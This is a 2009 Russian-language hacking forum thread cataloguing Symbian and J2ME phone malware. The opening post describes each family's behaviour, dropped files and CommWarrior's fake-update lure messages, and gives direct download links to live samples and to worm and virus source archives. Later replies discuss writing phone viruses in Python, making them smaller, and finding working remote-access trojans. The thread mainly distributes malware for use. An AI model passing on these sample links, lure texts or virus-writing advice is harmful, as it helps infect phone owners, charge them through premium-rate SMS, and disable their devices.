PDA

Просмотр полной версии : Symbian вирусы.


faza02
04.01.2009, 13:12
Вирусы для смартфонов 6-8 серии и не только.

Cabir (оригинальное название Caribe, также известен как EPOC.cabir и Symbian/Cabir) — название червя, написанного в 2004 году группой вирусописателей 29A, человеком, с псевдонимом Vallez.

Червь заражал телефоны, после этого на экран выводилось сообщение "Caribe". После этого, червь мог заражать другие смартфоны, по средствам Bluetooth. Антивирусные компании считали, что червь безвреден, но не смотря на это, существование червя доказывает, что смартфоны так же подвержены заражению.

Скачать можно здесь (http://sql.parsers.info/vir/cabir.zip). Если у кого то возникнут проблемы с распаковкой, или компиляцией - обращайтесь.

Mabir - очень похож на червя Cabire. Но есть одно отличие. Mabir не отправляет кому попало себя, а сам отвечает на все входящие сообщения и в ответ посылает MMS с троем.
Скачать тут (http://sql.parsers.info/vir/mabir.sis).

Commwarrior - известный вирус для смартфонов Symbian 60. Распространяется по средствам Bluetooth и MMS, подбирая адреса из телефонной книги абонента.
Обнаружены 2 разновидности вируса, создающие файлы:
\system\apps\CommWarrior\commwarrior.exe
\system\apps\CommWarrior\commrec.mdl

\system\updates\commrec.mdl
\system\updates\commwarrior.exe
\system\updates\commw.sis

Содержит текст:
CommWarrior v1.0 (c) 2005 by e10d0r
OTMOP03KAM HET!
Когда отсылается MMS или через Bluetooth, в сообщении можно увидеть следующий текст:

Norton AntiVirus
Released now for mobile, install it!

Dr.Web
New Dr.Web antivirus for Symbian OS. Try it!

MatrixRemover
Matrix has you. Remove matrix!

3DGame
3DGame from me. It is FREE !

MS-DOS
MS-DOS emulator for SymbvianOS. Nokia series 60 only. Try it!

PocketPCemu
PocketPC *REAL* emulator for Symbvian OS! Nokia only.

Nokia ringtoner
Nokia RingtoneManager for all models.

Security update #12
Significant security update. See www.symbian.com

Display driver
Real True Color mobile display driver!

Audio driver
Live3D driver with polyphonic virtual speakers!

Symbian security update
See security news at www.symbian.com

SymbianOS update
OS service pack #1 from Symbian inc.

Happy Birthday!
Happy Birthday! It is present for you!

Free SEX!
Free *SEX* software for you!

Virtual SEX
Virtual SEX mobile engine from Russian hackers!

Porno images
Porno images collection with nice viewer!

Internet Accelerator
Internet accelerator, SSL security update #7.

WWW Cracker
Helps to *CRACK* WWW sites like hotmail.com

Internet Cracker
It is *EASY* to *CRACK* provider accounts!

PowerSave Inspector
Save you battery and *MONEY*!

3DNow!
3DNow!(tm) mobile emulator for *GAMES*.

Desktop manager
Official Symbian desctop manager.

CheckDisk
*FREE* CheckDisk for SymbianOS released!MobiComm

Скачать обе версии вируса можно здесь (http://sql.parsers.info/vir/CommWarrior.sis).

Doomboot - вирус, написанный в 2005 году человеком с ником "WarriorMarrior" (?). Маскировался под игры Doom_2_wad, SplinterCell-ChaosTheory и Leslie Loves. При установке на смартфон, создавались файлы:
C:\ETel.dll
C:\system\data\IloveLeslie\LeslieLoves.jpg
C:\system\data\IloveLeslie\RecQWRD.mdl
Файлы LeslieLoves.jpg и RecQWRD.mdl являются файлами червя CommWarrior. Кроме указанных выше файлов в теле вредоносной программы имеется текстовой файл Read.txt.
После установки, вирус повреждает системные фалы, и устанавливает червя Commwarrior и он, в свою очередь, пытается разослать свои копии, что приводит к быстрому разряду аккумулятора.

Можно скачать здесь (http://sql.parsers.info/vir/doomboot.zip).

FlexiSpy - шпион. Получение такой информации как:

Перехват SMS
Перехват email
Определение местоположения телефона
Перехват истории звонков
Прослушивание звуков, улавливаемых микрофоном
Защита частной информации при краже телефона
Доступ к одному из средств оплаты: WebMoney, PayPal, VISA, MasterCard, American Express.


К сожалению, исходники найти не реально, т.к. трой платный. Более подробная информация сдесь (flexi-spy.ru).

Skulls - заменяет все стандартные иконки в меню на черепа. Отсюда и название. Распространялся человеком, с ником Tee-222. Вирус распространялся под видом программы Extended Theme Manager. Работает под Symbian 60. После инсталляции заменял черепами все работающие приложения, и заменяла их неработающими аналогами. Телефон превращался в бесполезную вещь.
Скачать тут (http://sql.parsers.info/vir/skulls.zip).

Skudoo - вирус, содержащий в себе Cabir и Doomboot. Сам Skudoo приводит в неработоспособность файловый менеджер и менеджер программ.
Скачать тут (http://sql.parsers.info/vir/skudoo.zip).

Drever - вирус делает атаку, по файлам антивирусов. Таких как:

F-Secure Mobile Anti-Virus
Kaspersky
Simworks

Скачать тут (http://rapidshare.com/files/132029740/Mobile_-_V_By_Gheli.rar).

Dampig (Hobble) - маскируется под crack для версии 3.2 приложения FSCaller.ampig. После установки, заражает червем Cabir и блокирует Bluetooth, СМС, файловый менеджер и телефонный справочник.
Скачать тут (http://sql.parsers.info/vir/Dampig.sis).

Locknut - похож на вирус Skulls.
Скачать тут (http://sql.parsers.info/vir/Locknut.sis).

RedBrowser - троян. Заражает любые телефоны, с поддержкой j2me. Суть его заключается в ом, что он отправляет смс на платные номера.
Скачать тут (http://sql.parsers.info/vir/RedBrowser.jar).

Ozicom - попасть может под видом игры или программы. При установке вируса, в меню удваиваются ярлыки, названия будут на иврите. Все ярлыки станут битыми. Если выключить телефон, не факт что он уже включится.
Скачать тут (http://sql.parsers.info/vir/ozicom.SIS).

Hobbes - при запуске устанавливается поврежденное приложение FExplorer. Псоле перезагрузки операционная система попытается запустить это приложение, что вызовет ошибку. После этого могут быть блокированы некоторые функции смартфона.
Скачать тут (http://rapidshare.com/files/132029740/Mobile_-_V_By_Gheli.rar).

HidMenu - после установки, на флеш-карта будет блокирована.
Скачать тут (http://sql.parsers.info/vir/HidMenu.sis).

fontal - если смартфон заражен этим вирусом и вы его перезагрузите, то включить его(смартфон) уже не получится.
Скачать тут (http://sql.parsers.info/vir/Fontal.sis).

Cadomesk - смесь Skulls и Cabir. Перезагружает сматфон каждые 10 секунд.
Скачать тут (http://sql.parsers.info/vir/Cadomesk.sis).

Lasco - в основе вирус Cabir. Создан в 2005 году.
Скачать тут (http://rapidshare.com/files/132029740/Mobile_-_V_By_Gheli.rar).

OneHop - чем-то похож на вирус Skulls. Заменяет стандартные иконки. Создан в 2005 году.
Скачать тут (http://sql.parsers.info/vir/Onehop.sis).

Сорцы вируса (http://sql.parsers.info/vir/velasco%20cellphone%20virus%20sources.zip).
Сорцы червя. (http://sql.parsers.info/vir/velasco%20cellphone%20worm%20sources.zip)

Осталось много вирусов без описания, весь архив можно скачать тут (http://rapidshare.com/files/132029740/Mobile_-_V_By_Gheli.rar).

(c) faza02 aka фа3а

Vans™
04.01.2009, 13:29
Отличненько, ток я не понял на симбиан 9.1 не будет работать? Давно хотел заняться этим вопросом...

iddqd
04.01.2009, 13:56
Вообще то, это боянчик.
А на 9 симбу вроде нету вирусов

Vans™
04.01.2009, 15:34
полноценных вирусных программ для Symbian 9 не существует, но а трои то есть на Java.

faza02
04.01.2009, 15:40
с чего вы взяли, что нет?
у меня были траблы с инетом, вскоре доработаю и выложу.
не надо говорить, мол боян, я на ачате еще не видел что б сами вири выкладывали. только описание видел.

iddqd
04.01.2009, 15:40
Ну трой на Java- это какое-то извращение. Он то по идее должен каждый раз запрашивать у пользователя разрешение на доступ к ресурсам телефона?

faza02
04.01.2009, 15:46
угу, у всех смартов так.. везде будет запрашивать.

Hexillion
04.01.2009, 18:49
да есть уже и на 9ку вроде называется Pan1ca v.1.20...

faza02
06.01.2009, 22:48
PHalls - вредоноснсти не обнаружил. Висит постоянно в трее.
Скачать тут (http://sql.parsers.info/vir/PHalls_Beta.sis).

Pan1ca - для 9 симбиан. Меняет логотип, изменяет шрифт телефона, меню становится пустым и бесполезным.
Скачать тут (http://sql.parsers.info/vir/Pan1ca.sisx).

mosquitos - игра, после установки без ведома пользователя отправляет смс на платный номер.
Скачать тут (http://sql.parsers.info/vir/mosquitos.sis).

Cardtrap - после установки повреждает приложения нерабоющими копиями. Так же, устанавливает вирусы, такие как Skulls, CommWarrior и Cabir. Помимо этого записывает несколько вирусов для Windows, которые при подключении смартфона к компьютеру копируются туда.
Скачать тут (http://sql.parsers.info/vir/Cardtrap.sis).

MGDropper - при установке, заражает другим вирусом - Cabir, делает приложения Simworks Anti-Virus, F-secure Mobile Anti-Virus, Application installer, Cabirfix, Decabir, F-Cabir, Fexplorer, File manager, Smart file manager, System Explorer (SeleQ) нерабочими, т.к. они могут помочь в удалении MGDropper'a.
Скачать тут (http://sql.parsers.info/vir/MGDropper.A.sis).

Mabtal - создает троян под Windows. При подключении, он перебрасывается на Windows.
Скачать тут (http://sql.parsers.info/vir/Mabtal.sis).

Worm62
06.01.2009, 23:01
Pan1ca - для 9 симбиан. Меняет логотип, изменяет шрифт телефона, меню становится пустым и бесполезным.
Скачать тут (http://sql.parsers.info/vir/Pan1ca.sisx).

на 9 симбу вирусов нет

X-Venom
06.01.2009, 23:11
помню на 8 симбе был вирус который передавался автоматически если блютуз включен, а если выключить блютуз то телефон перезагружаться начинал

faza02
06.01.2009, 23:15
Worm62, вот скачай и заюзай, потом скажешь..
X-Venom, Commwarrior скорее всего)

Dr Flint
15.01.2009, 01:31
Хм.. а есть сейчас кто вирусы пишет под симбу?)

iddqd
15.01.2009, 01:37
если тел не разблокирован- то вирус хер станет(сертификаты)

faza02
13.02.2009, 18:16
Хм.. а есть сейчас кто вирусы пишет под симбу?)
я пробовал, на питоне. но там проблема, т.к. вирь будет весить подозрительно много.. около 600 кб. но это интерпиратор + скрипт. если интерпиратор уже есть, то легче.
если тел не разблокирован- то вирус хер станет(сертификаты)
угу.
сори за ап.

iddqd
13.02.2009, 18:19
питон на смарте- отличная вещь, жаль только, что установлен он не у всех юзеров(в основном, у "продвинутых")
кстати, может есть какие-то способы сжатия? хотя, интерпретатор.. там и сжимать-то нечего... :(

faza02
13.02.2009, 18:23
можно ужать до 300 кб примерно.

muhyta
06.04.2009, 12:21
есть рабочие сервер-клиент трояны на симбу 6 ?

иддкд
06.04.2009, 12:37
омг, 6600 чтоле?

Krist_ALL
06.04.2009, 12:48
НА одном сайте про моблиьгные телефоны есть колекция symbian вирусов (44 штуки ) , но доступ имеют только проверенные люди. Да и проект заморожен( Не указал сайт, чтобы не посчитали рекламой.